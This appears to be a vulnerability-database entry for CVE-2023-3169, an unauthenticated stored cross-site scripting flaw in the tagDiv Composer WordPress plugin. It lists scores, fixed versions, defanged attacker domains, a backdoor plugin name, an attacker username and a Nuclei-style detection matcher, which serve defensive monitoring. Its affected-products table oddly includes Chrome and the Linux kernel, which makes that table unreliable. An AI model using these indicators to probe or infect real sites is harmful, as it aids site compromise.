cbcvebase.
CVE-2023-3169
published 2023-09-11

CVE-2023-3169: The tagDiv Composer WordPress plugin before 4.2, used as a companion by the Newspaper and Newsmag themes from tagDiv, does not have authorisation in a REST…

PriorityP179medium6.1CVSS 3.1
AVNACLPRNUIRSCCLILAN
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
1.59%
72.7th percentile
The tagDiv Composer WordPress plugin before 4.2, used as a companion by the Newspaper and Newsmag themes from tagDiv, does not have authorisation in a REST route and does not validate as well as escape some parameters when outputting them back, which could allow unauthenticated users to perform Stored Cross-Site Scripting attacks.

Affected

3 ranges
VendorProductVersion rangeFixed in
googlechrome_chrome
linuxlinux_kernel>= 0 < 5.4.0-144.1615.4.0-144.161
tagdivtagdiv_composer< 4.24.2

Detection & IOCsextracted from sources · hover to see the quote

urlhttps://stay.decentralappps[.]com/src/page.js
domainstay.decentralappps[.]com
domainpromsmotion[.]com
filenamewp-zexit.php
path/tmp/i
path404.php
sigma
matchers-condition: and
matchers:
- type: word
  part: body
  words:
  - 'tdw-css-placeholder">console.log({{string}})'

- type: word
  part: content_type
  words:
  - 'text/html'

- type: status
  status:
  - 200
  • Look for malicious script injected within specific HTML tags; the obfuscated injection can be found in the 'wp_options' table of the WordPress database.
  • Detect the Nuclei probe fingerprint: a GET request to the REST route that returns a body containing 'tdw-css-placeholder">console.log(' with HTTP 200 and content-type text/html confirms the XSS injection point.
  • Injected scripts use decimal-encoded ASCII obfuscation; decoding reveals the payload URL stay.decentralappps[.]com/src/page.js.
  • Presence of the wp-zexit plugin mimicking WordPress admin behavior and hiding a backdoor in the website's Ajax interface is a strong post-exploitation indicator.
  • Monitor for creation of new WordPress administrator accounts with auto-generated usernames based on the site's hostname, or the legacy username 'greeceman'.
  • ·The vulnerability exists only in tagDiv Composer plugin versions before 4.2; upgrading to 4.2 or later remediates the unauthenticated stored XSS via the unprotected REST route.
  • ·Attack waves evolved rapidly with increased randomization across injected scripts, URLs, and codes, making static IOC-based detection less reliable over time.
  • ·The Nuclei detection template first checks for an empty-body JSON 200 response on the REST route before proceeding to the XSS reflection check; both conditions must be met.

CVSS provenance

nvdv3.16.1MEDIUMCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
osv5.5MEDIUM
vulncheck6.1MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.